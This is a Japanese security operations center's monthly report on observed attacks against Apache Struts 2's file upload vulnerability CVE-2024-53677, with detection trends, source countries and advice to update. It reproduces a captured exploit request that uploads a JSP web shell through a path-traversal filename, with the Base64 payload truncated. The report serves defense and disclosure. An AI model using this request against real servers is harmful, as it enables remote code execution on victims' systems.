2025.02.18

2025年1月度 MBSD-SOCの検知傾向トピックス

Apache Struts 2のファイルアップロードの脆弱性（CVE-2024-53677）を狙った攻撃

　今月は、Apache Struts 2のファイルアップロードの脆弱性（CVE-2024-53677）を狙った攻撃を観測しました。本脆弱性は、2024/12/11(水)に公開されたもので、攻撃者に悪用された場合、悪意あるファイルをアップロードされ、任意のコードを実行されてしまう恐れがあります。

　本脆弱性のCVSS値（脆弱性の深刻度）は、9.5（Critical）と評価とされており、深刻な脆弱性に位置づけられています。また、既にPoC（概念実証コード）が公開されているため、当該製品を使用されている場合は、早急に最新のバージョンにアップデートすることをお勧めします。

　下図は、本脆弱性を狙った攻撃の検知数推移です。弊社SOCでは1/10(金)に初観測して以降、断続的に攻撃を検知しています。なお、攻撃元国はオランダ（80.8%）およびロシア（19.2%）となっておりました。

図. CVE-2024-53677の脆弱性を狙った攻撃の検知数推移

　以下は、弊社SOCで検知した攻撃例です。不正なJSPファイルのアップロードを試みた通信となっています。

図. CVE-2024-53677の脆弱性を狙った攻撃例
POST /uploads.action HTTP/1.1 Host: www.example.co.jp User-Agent: Mozilla/5.0 Accept-Encoding: gzip, deflate Accept: / Connection: keep-alive Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryn9clix5Vk6qB5adG Content-Length: 1365 ------WebKitFormBoundaryn9clix5Vk6qB5adG Content-Disposition: form-data; name=""upload[0]""; filename=""KuqyvmWX.jsp"" Content-Type: application/octet-stream <%@ page import=""java.util.Base64, java.nio.charset.StandardCharsets"" %> <% String encodedPayload = ""PCVAIHBhZ2UgaW1wb3J0PSJqYXZ ...Base64 部分省略... B9CiU+""; byte[] decodedBytes = Base64.getDecoder().decode(encodedPayload); String decoded = new String(decodedBytes, StandardCharsets.UTF_8); out.println(decoded); request.getRequestDispatcher(""temp.jsp"").include(request, response); %> ------WebKitFormBoundaryn9clix5Vk6qB5adG Content-Disposition: form-data; name=""uploadFileName[0]"" ../../../../../webapps/ROOT/KuqyvmWX.jsp ------WebKitFormBoundaryn9clix5Vk6qB5adG--